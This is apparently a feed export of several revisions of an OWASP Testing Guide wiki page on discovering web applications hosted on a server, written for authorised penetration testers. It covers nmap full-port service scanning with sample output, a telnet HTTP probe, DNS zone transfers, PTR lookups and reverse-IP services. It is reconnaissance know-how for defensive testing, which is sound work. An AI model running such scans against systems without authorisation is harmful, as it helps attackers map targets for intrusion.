DNS lookup tools such as ''nslookup'', ''dig'' or similar. &amp;lt;br&amp;gt;&lt;br /&gt;
Port scanners (such as nmap, http://www.insecure.org) and vulnerability scanners (such as Nessus: http://www.nessus.org; wikto: http://www.sensepost.com/research/wikto/). &amp;lt;br&amp;gt;&lt;br /&gt;
Search engines (Google, and other major engines). &amp;lt;br&amp;gt;&lt;br /&gt;
Specialized DNS-related web-based search service: see text.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=12115</id>
		<title>Enumerate Applications on Webserver (OTG-INFO-004)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=12115"/>
				<updated>2006-11-09T16:13:36Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: /* Black Box testing and example */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
A common step for testing vulnerabilities in a web presence is to find out which particular applications are hosted on a web server.&amp;lt;br/&amp;gt;&lt;br /&gt;
Many different applications, in fact, have known vulnerabilities and known attack strategies than can be exploited in order to gain remote control and/or data exploitation.&amp;lt;br&amp;gt;&lt;br /&gt;
In addition to this, many applications are often hosted on a particular web server without reference from the main website: this is true for internal and/or extranet website which could be misconfigured or not updated due to the perception they're used only &amp;quot;internally&amp;quot;.&amp;lt;br/&amp;gt;&lt;br /&gt;
Furthermore, many applications use common path for administrative interfaces which can be used to guess or bruteforce administrative passwords.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
With the proliferation of virtual web servers, the traditional 1:1-type relationship between an IP address and a web server is loosing much of its original significance. It is not uncommon to have multiple web sites / applications whose symbolic names resolve &lt;br /&gt;
to the same IP address (and this scenario is not limited to hosting environments, but applies to ordinary corporate environments as well).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sometimes you, as a security professional, is given a set of IP addresses (or possibly just one) as a target to test. No other knowledge. It is arguable that this scenario is more akin to a pentest-type engagement, but in any case it is expected that such an assignment would test all web applications accessible through this target (and possibly other things). The problem is, the given IP address hosts an http service on port 80, but if you access it specifying the IP address (which is all you know) it reports &amp;quot;No web &lt;br /&gt;
server configured at this address&amp;quot; or a similar message. But that system could &amp;quot;hide&amp;quot; a bunch of web applications, associated to unrelated symbolic (DNS) names. Obviously the extent of your analysis is deeply affected by the fact that you test the applications, or you do not - because you don't notice them, or you notice only SOME of them.&lt;br /&gt;
Sometimes the target specification is richer – maybe you are handed out a list of IP addresses and their corresponding symbolic names. Nevertheless, this list might convey partial information, i.e. it could omit some symbolic names – and the client might not even being aware of that! (this is more likely to happen in large organizations).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Other issues affecting the scope of the assessment are represented by web applications published at non-obvious URLs (e.g., http://www.example.com/some-strange-URL), which are not referenced elsewhere. This may happen either by error (due to misconfigurations), or intentionally (for example, unadvertised administrative interfaces).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
To address these issues it is necessary to perform a web application discovery.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Web application discovery''' &amp;lt;br&amp;gt;&lt;br /&gt;
Web application discovery is a process aimed at identifying web applications on given infrastructure. The latter is usually specified as a set of IP addresses (maybe a net block), but may consist also of a set of DNS symbolic names, or a mix of the two.&amp;lt;br&amp;gt;&lt;br /&gt;
This information is handed out prior to the execution of an assessment, be it a classic-style penetration test or an application-focused assessment. In both cases, unless the rules of engagement specify otherwise (e.g., “test only the application located at the URL http://www.example.com/”), the assessment should strive to be the most comprehensive in scope, i.e. it should, first of all, identify all the applications accessible through the given target. In the following we will examine a few techniques that can be employed to achieve this goal. &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Notes&amp;lt;/u&amp;gt; Some of the following techniques apply to Internet-facing web servers, namely DNS and reverse-IP web-based search services and the use of search engines. Examples make use of private IP addresses (such as ''192.168.1.100'') which, unless indicated otherwise, represent ''generic'' IP addresses and are used only for anonymity purposes.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There are two factors influencing how many applications are related to a given DNS name (or an IP address).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''1. Different base URL''' &amp;lt;br&amp;gt;&lt;br /&gt;
The obvious entry point for a web application is ''www.example.com'', i.e. with this shorthand notation we think of the web application originating at http://www.example.com/ (the same applies for https). However, though this is the most common situation, there is nothing forcing the application to start at “/”.&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the same symbolic name may be associated to three web applications such as &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url1 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url2 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url3 &amp;lt;br&amp;gt;&lt;br /&gt;
In this case the URL http://www.example.com/ would not be associated to a meaningful page, and the three applications would be “hidden” unless we explicitly know how to reach them, i.e. we know ''url1'', ''url2'' or ''url3''. There is usually no need to publish web applications in this way, unless you don’t want them to be accessible in a standard way, and you are prepared to inform your users about their exact location. This doesn’t mean that these applications are secret, but that their existence and location is not explicitly advertised.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''2. Non-standard ports''' &amp;lt;br&amp;gt;&lt;br /&gt;
While web applications usually live on port 80 (http) and 443 (https), there is nothing magic about these port numbers. In fact, web applications may be associated with arbitrary TCP ports, and can be referenced by specifying the port number as follows: http[s]://www.example.com:port/. For example, http://www.example.com:20000/.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There is another factor affecting how many web applications are related to a given IP address.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''3. Virtual hosts''' &amp;lt;br&amp;gt;&lt;br /&gt;
DNS allows to associate a single IP address to one or more symbolic names. For example, the IP address ''192.168.1.100'' might be associated to DNS names ''www.example.com, helpdesk.example.com, webmail.example.com'' (actually, it is not necessary that all the names belong to the same DNS domain). This 1-to-N relationship may be reflected to serve different content by using so called virtual hosts. The information specifying the virtual host we are referring to is embedded in the HTTP 1.1 ''Host:'' header [1].&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
We would not suspect the existence of other web applications in addition to the obvious ''www.example.com'', unless we know of ''helpdesk.example.com'' and ''webmail.example.com''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 1 - non-standard URLs'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There is no way to full-proof ascertain the existence of non-standard-named web applications. Being non-standard, there is no magic recipe handing them out. However, we may employ a few criteria that will aid in their quest.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
First, if the web server is misconfigured and allows directory browsing, it may be possible to spot these applications. Vulnerability scanners may help with this respect. &amp;lt;br&amp;gt;&lt;br /&gt;
Second, these applications might be referenced by other web pages; as such, there is a chance that they have been spidered and indexed by web search engines. If we suspect the existence of such “hidden” applications on ''www.example.com'' we could, for example, do a bit of googling using the ''site'' operator and examining the result of a query for “site: www.example.com”. Among the returned URLs there could be one pointing to such a non-obvious application.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Another option is to probe for URLs which might be likely candidates for non-published applications. For example, a web mail front end might be accessible from https://www.example.com/webmail, while this URL could not be referenced anywhere (after all, employees would know where the webmail application is located, while there is no reason to tell this information to outsiders by publishing it onto the corporate web site). The same holds for administrative interfaces, which may be published at standard URLs (for example: A Tomcat administrative interface), and yet not being referenced anywhere. So, doing a bit of dictionary-style searching (or “intelligent guessing”) could yield back some results. Vulnerability scanners may help with this respect.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 2 - non-standard ports'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Existence of web applications on non-standard ports is easy to check. A port scanner such as nmap [2] is capable of performing service recognition by means of the -sV option, and will identify http[s] services on arbitrary ports. What is required is a full scan of the whole 64k TCP port address space.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the following command will look up, with a TCP connect scan, all open ports on IP ''192.168.1.100'' and will try to determine what services are bound to them (only ''essential'' switches are shown – nmap features a broad set of options, whose discussion is out of scope).&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
nmap –P0 –sT –sV –p1-65535 192.168.1.100&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
It is sufficient to examine the output and looking for http or the indication of SSL-wrapped services (which should be probed to confirm they are https). For example, the output of the previous command could look like&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Interesting ports on 192.168.1.100:&lt;br /&gt;
(The 65527 ports scanned but not shown below are in state: closed)&lt;br /&gt;
PORT      STATE SERVICE     VERSION&lt;br /&gt;
22/tcp    open  ssh         OpenSSH 3.5p1 (protocol 1.99)&lt;br /&gt;
80/tcp    open  http        Apache httpd 2.0.40 ((Red Hat Linux))&lt;br /&gt;
443/tcp   open  ssl         OpenSSL&lt;br /&gt;
901/tcp   open  http        Samba SWAT administration server&lt;br /&gt;
1241/tcp  open  ssl         Nessus security scanner&lt;br /&gt;
3690/tcp  open  unknown&lt;br /&gt;
8000/tcp  open  http-alt?&lt;br /&gt;
8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
From this example, we see that&lt;br /&gt;
* There is an Apache http server running on port 80&lt;br /&gt;
* It looks like there is an https server on port 443 (but this needs to be confirmed; for example, by visiting https://192.168.1.100 with a browser)&lt;br /&gt;
* On port 901 there is a Samba SWAT web interface&lt;br /&gt;
* The service on port 1241 is not https, but is the SSL-wrapped Nessus daemon&lt;br /&gt;
* Port 3690 features an unspecified service (nmap gives back its ''fingerprint'' - here omitted for clarity - together with instructions to submit it for incorporation in the nmap fingerprint database, provided you know which service it represents)&lt;br /&gt;
* Another unspecified service on port 8000; this might possibly be http, since it is not uncommon to find http servers on this port. Let's give it a look&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ telnet 192.168.10.100 8000&lt;br /&gt;
Trying 192.168.1.100...&lt;br /&gt;
Connected to 192.168.1.100.&lt;br /&gt;
Escape character is '^]'.&lt;br /&gt;
GET / HTTP/1.0&lt;br /&gt;
&lt;br /&gt;
HTTP/1.0 200 OK&lt;br /&gt;
pragma: no-cache&lt;br /&gt;
Content-Type: text/html&lt;br /&gt;
Server: MX4J-HTTPD/1.0&lt;br /&gt;
expires: now&lt;br /&gt;
Cache-Control: no-cache&lt;br /&gt;
&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
This confirms that in fact it is an HTTP server. Alternatively,we could have visited the URL with a web browser; or used the GET or HEAD Perl commands, which mimick HTTP interactions such as the one given above (however HEAD requests may not be honored by all servers)&lt;br /&gt;
* Apache Tomcat running on port 8080&lt;br /&gt;
&lt;br /&gt;
The same task may be performed by vulnerability scanners – but first check that your scanner of choice is able to identify http[s] services running on non-standard ports. For example, Nessus [3] is capable of identifying them on arbitrary ports (provided you instruct it to scan all the ports), and will provide – with respect to nmap – a number of tests on known web server vulnerabilities, as well as on the SSL configuration of https services. As hinted before, Nessus is also able to spot popular applications / web interfaces which could otherwise go unnoticed (for example, a Tomcat administrative interface).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 3 - virtual hosts'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There is a number of techniques which may be used to identify DNS names associated to a given IP address ''x.y.z.t''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS zone transfers&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This technique is nowadays of limited usage, given the fact that zone transfers are largely not honored by DNS servers, but it is worth a try. &amp;lt;br&amp;gt;&lt;br /&gt;
First of all, we must determine the name servers serving ''x.y.z.t''. If a symbolic name is known for ''x.y.z.t'' (let it be ''www.example.com''), its name servers can be determined by means of tools such as ''nslookup'' or ''dig'' by requesting DNS NS records.&amp;lt;br&amp;gt;&lt;br /&gt;
If no symbolic names are known for ''x.y.z.t'', but your target definition contains at least a symbolic name, you may try to apply the same process and query the name server of that name (hoping that ''x.y.z.t'' will be served as well by that name server). For example, if your target consists of the IP address ''x.y.z.t'' and of ''mail.example.com'', determine the name servers for domain ''example.com''.&amp;lt;br&amp;gt;&lt;br /&gt;
Then a zone transfer may be requested to the name servers for domain ''example.com''; if you are lucky, you will get back a list of the DNS entries for this domain. This will include the obvious ''www.example.com'' and the not-so-obvious ''helpdesk.example.com'' and ''webmail.example.com'' (and possibly others). Check all names returned by the zone transfer and consider all of those which are related to the target being evaluated.  &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS inverse queries&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This process is similar to the previous but relies on inverse (PTR) DNS records. Rather than requesting a zone transfer, try setting the record type to PTR and issue a query on the given IP address. If you are lucky, you may get back a DNS name entry. This technique relies on the existence of IP-to-symbolic name maps, which is not granted.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Web-based DNS searches&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This kind of search is akin to DNS zone transfer, but relies on web-based services which allow to perform name-based searched on DNS. One such a service is the ''Netcraft Search DNS'' service, available at http://searchdns.netcraft.com/?host. You may query for a list of names belonging to your domain of choice, such as ''example.com''. Then you will check whether the names you obtained are pertaining to the target you are examining.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Reverse-IP services&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
Reverse-IP services are similar to DNS inverse queries, with the difference that you query a web-based application instead of a name server. There is a number of such services available. Since they tend to return partial (and often different) results, it is better to use multiple services to obtain a more comprehensive analysis.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''Domain tools reverse IP'': http://www.domaintools.com/reverse-ip/ &amp;lt;br&amp;gt;&lt;br /&gt;
(requires free membership) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''MSN search'': http://search.msn.com &amp;lt;br&amp;gt;&lt;br /&gt;
syntax: &amp;quot;ip:x.x.x.x&amp;quot; (without the quotes) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''Webhosting info'': http://whois.webhosting.info/ &amp;lt;br&amp;gt; &lt;br /&gt;
syntax: http://whois.webhosting.info/x.x.x.x &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''DNSstuff'': http://www.dnsstuff.com/ &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple services available) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
http://net-square.com/msnpawn/index.shtml &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple queries on  domains and IP addresses, requires installation) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''tomDNS'': http://www.tomdns.net/ &amp;lt;br&amp;gt;&lt;br /&gt;
(some services are still private at the time of writing) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''SEOlogs.com'': http://www.seologs.com/ip-domains.html &amp;lt;br&amp;gt;&lt;br /&gt;
(reverse ip/domain lookup) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;Googling&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
After you have gathered the most information you can with the previous techniques, you can rely on search engines to possibly refine and increment your analysis. This may yield evidence of additional symbolic names belonging to your target, or applications accessible via non-obvious URLs.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
'''Testing for Topic X vulnerabilities:'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Result Expected:'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
== References ==&lt;br /&gt;
[1] RFC 2616 – Hypertext Transfer Protocol – HTTP 1.1 &amp;lt;br&amp;gt;&lt;br /&gt;
[2] nmap, http://www.insecure.org &amp;lt;br&amp;gt;&lt;br /&gt;
[3] Nessus Vulnerability Scanner, http://www.nessus.org &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
DNS lookup tools such as ''nslookup'', ''dig'' or similar. &amp;lt;br&amp;gt;&lt;br /&gt;
Port scanners (such as nmap, http://www.insecure.org) and vulnerability scanners (such as Nessus: http://www.nessus.org; wikto: http://www.sensepost.com/research/wikto/). &amp;lt;br&amp;gt;&lt;br /&gt;
Search engines (Google, and other major engines). &amp;lt;br&amp;gt;&lt;br /&gt;
Specialized DNS-related web-based search service: see text.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=11871</id>
		<title>Enumerate Applications on Webserver (OTG-INFO-004)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=11871"/>
				<updated>2006-11-06T13:13:08Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: /* Black Box testing and example */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
A common step for testing vulnerabilities in a Web presence is to find out which particular applications are hosted on a Web Server.&amp;lt;br/&amp;gt;&lt;br /&gt;
Many different applications, in fact, have known vulnerabilities and known attack strategies than can be exploited in order to gain remote control and/or data exploitation.&amp;lt;br&amp;gt;&lt;br /&gt;
In addition to this many applications are often hosted on a particular web server without reference from the main website: this is true for internal and/or extranet website which could be misconfigured or not updated due to the perception they're used only &amp;quot;internally&amp;quot;.&amp;lt;br/&amp;gt;&lt;br /&gt;
In addition to this many application use common path for administrative interfaces which can be used to guess or bruteforce administrative passwords.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
With the proliferation of virtual web servers, the traditional 1:1-type relationship between an IP address and a web server is loosing much of its original significance. It is not uncommon to have multiple web sites / applications whose symbolic names resolve &lt;br /&gt;
to the same IP address (and this scenario is not limited to hosting environments, but applies to ordinary corporate environments as well).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sometimes you, as a security professional, are given a set of IP addresses (or maybe just one) as a target to test. No other knowledge. It is arguable that this setting is more akin to a pentest-type engagement, but in any case it is expected that such an assignment would test all web applications accessible through this target (and possibly other things...). The problem is, the given IP address hosts an http service on port 80, but if you access it specifying the IP address (which is all you know) it reports &amp;quot;No web &lt;br /&gt;
server configured at this address&amp;quot; or a similar message. But that system could &amp;quot;hide&amp;quot; a bunch of web applications, associated to unrelated symbolic (DNS) names. Obviously the extent of your analysis is deeply affected by the fact that you test the applications, or you do not - because you don't notice them, or you notice only SOME of them.&lt;br /&gt;
Sometimes the target specification is richer – maybe you are handed out a list of IP addresses and their corresponding symbolic names. Nevertheless, this list might convey partial information, i.e. it could omit some symbolic names – and the client might not even being aware of that! (this is more likely to happen in large organizations).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Other issues affecting the scope of the assessment are represented by web applications published at non-obvious URLs (e.g., http://www.example.com/some-strange-URL), which are not referenced elsewhere. This may happen either by error (due to misconfigurations), or intentionally (for example, unadvertised administrative interfaces).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
To address these issues it is necessary to perform a web application discovery.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Web application discovery''' &amp;lt;br&amp;gt;&lt;br /&gt;
Web application discovery is a process aimed at identifying web applications on given infrastructure. The latter is usually specified as a set of IP addresses (maybe a net block), but may consist also of a set of DNS symbolic names, or a mix of the two.&amp;lt;br&amp;gt;&lt;br /&gt;
This information is handed out prior to the execution of an assessment, be it a classic-style penetration test or an application-focused assessment. In both cases, unless the rules of engagement specify otherwise (e.g., “test only the application located at the URL http://www.example.com/”), the assessment should strive to be the most comprehensive in scope, i.e. it should, first of all, identify all the applications accessible through the given target. In the following we will examine a few techniques that can be employed to achieve this goal. &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Notes&amp;lt;/u&amp;gt; Some of the following techniques apply to Internet-facing web servers, namely DNS and reverse-IP web-based search services and the use of search engines. Examples make use of private IP addresses (such as ''192.168.1.100'') which, unless indicated otherwise, represent ''generic'' IP addresses and are used only for anonymity purposes.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There are two factors influencing how many applications are related to a given DNS name (or an IP address).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''1. Different base URL''' &amp;lt;br&amp;gt;&lt;br /&gt;
The obvious entry point for a web application is ''www.example.com'', i.e. with this shorthand notation we think of the web application originating at http://www.example.com/ (the same applies for https). However, though this is the most common situation, there is nothing forcing the application to start at “/”.&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the same symbolic name may be associated to three web applications such as &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url1 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url2 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url3 &amp;lt;br&amp;gt;&lt;br /&gt;
In this case the URL http://www.example.com/ would not be associated to a meaningful page, and the three applications would be “hidden” unless we explicitly know how to reach them, i.e. we know ''url1'', ''url2'' or ''url3''. There is usually no need to publish web applications in this way, unless you don’t want them to be accessible in a standard way, and you are prepared to inform your users about their exact location. This doesn’t mean that these applications are secret, but that their existence and location is not explicitly advertised.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''2. Non-standard ports''' &amp;lt;br&amp;gt;&lt;br /&gt;
While web applications usually live on port 80 (http) and 443 (https), there is nothing magic about these port numbers. In fact, web applications may be associated with arbitrary TCP ports, and can be referenced by specifying the port number as follows: http[s]://www.example.com:port/. For example, http://www.example.com:20000/.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There is another factor affecting how many web applications are related to a given IP address.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''3. Virtual hosts''' &amp;lt;br&amp;gt;&lt;br /&gt;
DNS allows to associate a single IP address to one or more symbolic names. For example, the IP address ''192.168.1.100'' might be associated to DNS names ''www.example.com, helpdesk.example.com, webmail.example.com'' (actually, it is not necessary that all the names belong to the same DNS domain). This 1-to-N relationship may be reflected to serve different content by using so called virtual hosts. The information specifying the virtual host we are referring to is embedded in the HTTP 1.1 ''Host:'' header [1].&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
We would not suspect the existence of other web applications in addition to the obvious ''www.example.com'', unless we know of ''helpdesk.example.com'' and ''webmail.example.com''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 1 - non-standard URLs'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There is no way to full-proof ascertain the existence of non-standard-named web applications. Being non-standard, there is no magic recipe handing them out. However, we may employ a few criteria that will aid in their quest.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
First, if the web server is misconfigured and allows directory browsing, it may be possible to spot these applications. Vulnerability scanners may help with this respect. &amp;lt;br&amp;gt;&lt;br /&gt;
Second, these applications might be referenced by other web pages; as such, there is a chance that they have been spidered and indexed by web search engines. If we suspect the existence of such “hidden” applications on ''www.example.com'' we could, for example, do a bit of googling using the ''site'' operator and examining the result of a query for “site: www.example.com”. Among the returned URLs there could be one pointing to such a non-obvious application.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Another option is to probe for URLs which might be likely candidates for non-published applications. For example, a web mail front end might be accessible from https://www.example.com/webmail, while this URL could not be referenced anywhere (after all, employees would know where the webmail application is located, while there is no reason to tell this information to outsiders by publishing it onto the corporate web site). The same holds for administrative interfaces, which may be published at standard URLs (for example: A Tomcat administrative interface), and yet not being referenced anywhere. So, doing a bit of dictionary-style searching (or “intelligent guessing”) could yield back some results. Vulnerability scanners may help with this respect.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 2 - non-standard ports'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Existence of web applications on non-standard ports is easy to check. A port scanner such as nmap [2] is capable of performing service recognition by means of the -sV option, and will identify http[s] services on arbitrary ports. What is required is a full scan of the whole 64k TCP port address space.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the following command will look up, with a TCP connect scan, all open ports on IP ''192.168.1.100'' and will try to determine what services are bound to them (only ''essential'' switches are shown – nmap features a broad set of options, whose discussion is out of scope).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''nmap –P0 –sT –sV –p1-65535 192.168.1.100''&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
It is sufficient to examine the output and looking for http or the indication of SSL-wrapped services (which should be probed to confirm they are https).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
The same task may be performed by vulnerability scanners – but first check that your scanner of choice is able to identify http[s] services running on non-standard ports. For example, Nessus [3] is capable of identifying them on arbitrary ports (provided you instruct it to scan all the ports), and will provide – with respect to nmap – a number of tests on known web server vulnerabilities, as well as on the SSL configuration of https services. As hinted before, Nessus is also able to spot popular applications / web interfaces which could otherwise go unnoticed.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 3 - virtual hosts'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There is a number of techniques which may be used to identify DNS names associated to a given IP address ''x.y.z.t''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS zone transfers&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This technique is nowadays of limited usage, given the fact that zone transfers are largely not honored by DNS servers, but it is worth a try. &amp;lt;br&amp;gt;&lt;br /&gt;
First of all, we must determine the name servers serving ''x.y.z.t''. If a symbolic name is known for ''x.y.z.t'' (let it be ''www.example.com''), its name servers can be determined by means of tools such as ''nslookup'' or ''dig'' by requesting DNS NS records.&amp;lt;br&amp;gt;&lt;br /&gt;
If no symbolic names are known for ''x.y.z.t'', but your target definition contains at least a symbolic name, you may try to apply the same process and query the name server of that name (hoping that ''x.y.z.t'' will be served as well by that name server). For example, if your target consists of the IP address ''x.y.z.t'' and of ''mail.example.com'', determine the name servers for domain ''example.com''.&amp;lt;br&amp;gt;&lt;br /&gt;
Then a zone transfer may be requested to the name servers for domain ''example.com''; if you are lucky, you will get back a list of the DNS entries for this domain. This will include the obvious ''www.example.com'' and the not-so-obvious ''helpdesk.example.com'' and ''webmail.example.com'' (and possibly others). Check all names returned by the zone transfer and consider all of those which are related to the target being evaluated.  &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS inverse queries&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This process is similar to the previous but relies on inverse (PTR) DNS records. Rather than requesting a zone transfer, try setting the record type to PTR and issue a query on the given IP address. If you are lucky, you may get back a DNS name entry. This technique relies on the existence of IP-to-symbolic name maps, which is not granted.&lt;br /&gt;
